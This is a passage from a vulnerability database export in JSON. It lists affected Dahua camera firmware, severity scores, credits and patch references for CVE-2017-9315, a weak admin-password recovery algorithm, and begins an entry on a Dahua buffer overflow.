                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw4xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw4xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw4xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdw4xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw4xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw4xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hf5xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hf5xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw5xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw5xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdw5xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdw5xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw5xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw5xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hf8xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hf8xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hfw8xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hfw8xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hdbw8xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hdbw8xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-ebw8xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-ebw8xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-pfw8xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-pfw8xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-sd2xxxxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-sd2xxxxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-pdbw8xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-pdbw8xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:ipc-hum8xxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:ipc-hum8xxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:psd8xxxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:psd8xxxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-sd4xxxxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-sd4xxxxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-sd5xxxxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-sd5xxxxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              },
              {
                "children": [
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:o:dahuasecurity:dh-sd6xxxxx_firmware:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": true
                      }
                    ],
                    "operator": "OR"
                  },
                  {
                    "children": [],
                    "cpe_match": [
                      {
                        "cpe23Uri": "cpe:2.3:h:dahuasecurity:dh-sd6xxxxx:-:*:*:*:*:*:*:*",
                        "cpe_name": [],
                        "vulnerable": false
                      }
                    ],
                    "operator": "OR"
                  }
                ],
                "cpe_match": [],
                "operator": "AND"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-9315"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Kenney Lu Trend Micro",
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-18-130"
          }
        ],
        "trust": 0.7
      },
      "cve": "CVE-2017-9315",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "acInsufInfo": false,
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "NVD",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "obtainAllPrivilege": false,
                "obtainOtherPrivilege": false,
                "obtainUserPrivilege": false,
                "severity": "MEDIUM",
                "trust": 1.0,
                "userInteractionRequired": false,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "None",
                "author": "NVD",
                "availabilityImpact": "None",
                "baseScore": 5.0,
                "confidentialityImpact": "Partial",
                "exploitabilityScore": null,
                "id": "CVE-2017-9315",
                "impactScore": null,
                "integrityImpact": "None",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "Medium",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "MEDIUM",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "ZDI",
                "availabilityImpact": "COMPLETE",
                "baseScore": 8.3,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 8.6,
                "id": "CVE-2017-9315",
                "impactScore": 8.5,
                "integrityImpact": "PARTIAL",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "HIGH",
                "trust": 0.7,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "CNVD",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 10.0,
                "id": "CNVD-2017-38224",
                "impactScore": 2.9,
                "integrityImpact": "PARTIAL",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 5.0,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "VHN-117518",
                "impactScore": 2.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "NVD",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2017-9315",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "NVD",
                "id": "CVE-2017-9315",
                "trust": 1.8,
                "value": "CRITICAL"
              },
              {
                "author": "ZDI",
                "id": "CVE-2017-9315",
                "trust": 0.7,
                "value": "HIGH"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2017-38224",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201705-1393",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULHUB",
                "id": "VHN-117518",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-18-130"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-38224"
          },
          {
            "db": "VULHUB",
            "id": "VHN-117518"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-011143"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-9315"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201705-1393"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Customer of Dahua IP camera or IP PTZ could submit relevant device information to receive a time limited temporary password from Dahua authorized dealer to reset the admin password. The algorithm used in this mechanism is potentially at risk of being compromised and subsequently utilized by attacker. Dahua IP Camera and IP PTZ Contains a cryptographic vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Dahua Technology IP Camera. Authentication is not required to exploit this vulnerability.The specific flaw exists within the disaster recovery password functionality. If the device uses its default settings, the password generation algorithm produces a predictable result. An attacker can leverage this vulnerability to gain control of the device under attack. Dahua IPC-HFW and others are network camera equipment of Dahua Company of China. There are security vulnerabilities in several Dahua products. An attacker could use this vulnerability to reset the administrator password. Dahua IPC-HFW, etc. The following products are affected: Dahua IPC-HFW1XXX Build 2015/07 to 2017/03; IPC-HDW1XXX Build 2015/07 to 2017/03; IPC-HDBW1XXX Build 2015/07 to 2017/03; IPC- HFW2XXX Build 2015/07 to 2017/03; IPC-HDW2XXX Build 2015/07 to 2017/03; IPC-HDBW2XXX Build 2015/07 to 2017/03; IPC-HFW4XXX Build 2015/07 to 2017 /03 version; IPC-HDW4XXX Build 2015/07 to 2017/03 version; IPC-HDBW4XXX Build 2015/07 to 2017/03 version; IPC-HF5XXX Build 2015/07 to 2017/03 version; IPC-HFW5XXX Build 2015/07 to 2017/03; IPC-HDW5XXX Build 2015/07 to 2017/03; IPC-HDBW5XXX Build 2015/07 to 2017/03; IPC-HF8XXX Build 2015/07 to 2017/03 Version; IPC-HFW8XXX Build 2015/07 to 2017/03; IPC-HDBW8XXX Build 2015/07 to 2017/03; IPC-EBW8XXX Build 2015/07 to 2017/03; IPC-PFW8xxx Build 2015/ 07 version to 2017/03 version; IPC-PDBW8xxx Build 2015/07 version to 2017/03 version; IPC-HUM8xxx Build 2015/07 version to 2017/03 version",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2017-9315"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-011143"
          },
          {
            "db": "ZDI",
            "id": "ZDI-18-130"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-38224"
          },
          {
            "db": "VULHUB",
            "id": "VHN-117518"
          }
        ],
        "trust": 2.88
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2017-9315",
            "trust": 3.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-011143",
            "trust": 0.8
          },
          {
            "db": "ZDI_CAN",
            "id": "ZDI-CAN-4956",
            "trust": 0.7
          },
          {
            "db": "ZDI",
            "id": "ZDI-18-130",
            "trust": 0.7
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201705-1393",
            "trust": 0.7
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-38224",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-117518",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-18-130"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-38224"
          },
          {
            "db": "VULHUB",
            "id": "VHN-117518"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-011143"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-9315"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201705-1393"
          }
        ]
      },
      "id": "VAR-201711-1047",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-38224"
          },
          {
            "db": "VULHUB",
            "id": "VHN-117518"
          }
        ],
        "trust": 1.580443946875
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "IoT",
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2017-38224"
          }
        ]
      },
      "last_update_date": "2023-12-18T13:57:10.426000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top Page",
            "trust": 0.8,
            "url": "http://www.dahuasecurity.com/"
          },
          {
            "title": "Dahua Technology has issued an update to correct this vulnerability.",
            "trust": 0.7,
            "url": "http://www.dahuasecurity.com/support/cybersecurity/annoucementnotice/152"
          },
          {
            "title": "Patches for multiple Dahua product password reset vulnerabilities",
            "trust": 0.6,
            "url": "https://www.cnvd.org.cn/patchinfo/show/111791"
          },
          {
            "title": "Multiple Dahua Product security vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=99835"
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-18-130"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-38224"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-011143"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201705-1393"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "NVD-CWE-noinfo",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-310",
            "trust": 0.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-117518"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-011143"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-9315"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.3,
            "url": "http://www.dahuasecurity.com/annoucementsingle/security-advisory--admin-password-recovery-mechanism-in-some-dahua-ip-camera-and-ip-ptz-could-lead-to-security-risk_14731_221.html"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-9315"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2017-9315"
          },
          {
            "trust": 0.7,
            "url": "http://www.dahuasecurity.com/support/cybersecurity/annoucementnotice/152"
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-18-130"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-38224"
          },
          {
            "db": "VULHUB",
            "id": "VHN-117518"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-011143"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-9315"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201705-1393"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "ZDI",
            "id": "ZDI-18-130"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2017-38224"
          },
          {
            "db": "VULHUB",
            "id": "VHN-117518"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-011143"
          },
          {
            "db": "NVD",
            "id": "CVE-2017-9315"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201705-1393"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-01-19T00:00:00",
            "db": "ZDI",
            "id": "ZDI-18-130"
          },
          {
            "date": "2017-12-26T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-38224"
          },
          {
            "date": "2017-11-28T00:00:00",
            "db": "VULHUB",
            "id": "VHN-117518"
          },
          {
            "date": "2018-01-09T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-011143"
          },
          {
            "date": "2017-11-28T19:29:00.400000",
            "db": "NVD",
            "id": "CVE-2017-9315"
          },
          {
            "date": "2017-05-30T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201705-1393"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2018-01-19T00:00:00",
            "db": "ZDI",
            "id": "ZDI-18-130"
          },
          {
            "date": "2017-12-27T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2017-38224"
          },
          {
            "date": "2019-10-03T00:00:00",
            "db": "VULHUB",
            "id": "VHN-117518"
          },
          {
            "date": "2018-01-09T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2017-011143"
          },
          {
            "date": "2019-10-03T00:03:26.223000",
            "db": "NVD",
            "id": "CVE-2017-9315"
          },
          {
            "date": "2019-10-23T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201705-1393"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201705-1393"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Dahua IP Camera and  IP PTZ Cryptographic vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2017-011143"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "encryption problem",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201705-1393"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202004-1823

    Vulnerability from variot - Updated: 2023-12-18 13:51

    Some Dahua products have buffer overflow vulnerabilities. After the successful login of the legal account, the attacker sends a specific DDNS test command, which may cause the device to go down. Dahua The product contains a classic buffer overflow vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Dahua SD6AL Series and others are products of China Dahua Company. SD6AL Series is a SD6AL series network camera. NVR 5x Series is a 5x series network video recorder. IPC-HX2XXX Series is an IPC-HX2XXX series network camera

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
